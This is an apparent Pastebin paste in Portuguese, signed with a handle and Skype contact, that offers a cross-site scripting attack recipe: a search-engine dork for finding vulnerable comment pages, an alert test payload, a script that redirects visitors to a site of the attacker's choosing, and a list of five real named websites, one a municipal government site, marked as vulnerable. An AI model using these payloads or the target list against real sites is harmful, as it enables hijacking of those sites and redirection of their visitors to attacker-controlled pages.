API tools faq
paste
Advertisement
-Show

Falha XSS (Cross-Site Scripting)

-Show
Nov 23rd, 2014
505
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.31 KB | None | 0 0
raw download clone embed print report
  1. _________.__ ___________ __ .__ .__
  2. / _____/| |__ ______ _ __ \__ ___/_ ___/ |_ ___________|__|____ | |
  3. ______ \_____ \ | | \ / _ \ \/ \/ / | | | | \ __\/ _ \_ __ \ \__ \ | |
  4. /_____/ / \| Y ( <_> ) / | | | | /| | ( <_> ) | \/ |/ __ \| |__
  5. /_______ /|___| /\____/ \/\_/ |____| |____/ |__| \____/|__| |__(____ /____/
  6. \/ \/ \/
  7.  
  8. +--------------------------------+'
  9. ' Falha XSS '
  10. ' Skype: lukinha.down '
  11. ' By: -Show '
  12. +---------------------------------+
  13.  
  14. XSS (Cross-Site Scripting)
  15. Dork: inurl:mostrar=comentarios
  16.  
  17. Testando a falha: <script>alert('Teste falha XSS');</script>
  18.  
  19. Redirect:
  20. <script>window.location = "SEU SITE AQUI"</script>
  21.  
  22. Sites vuln:
  23. http://radiofilp.xpg.uol.com.br/teste8084.html?mostrar=comentarios&id=9ca43079a6
  24.  
  25. http://quintascarpintaria.comoj.com/produtos.php?mostrar=comentarios&id=2ffea71ac3
  26.  
  27. http://www.ancientscripts.com/search.php?q=
  28.  
  29. http://www.kshs.org/library/search.php?q=cgi-bin/news.cgi&county=DP&arrange=date
  30.  
  31. http://www.riobonito.pr.gov.br/?mostrar=comentarios&id=7ba3a6e60f
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!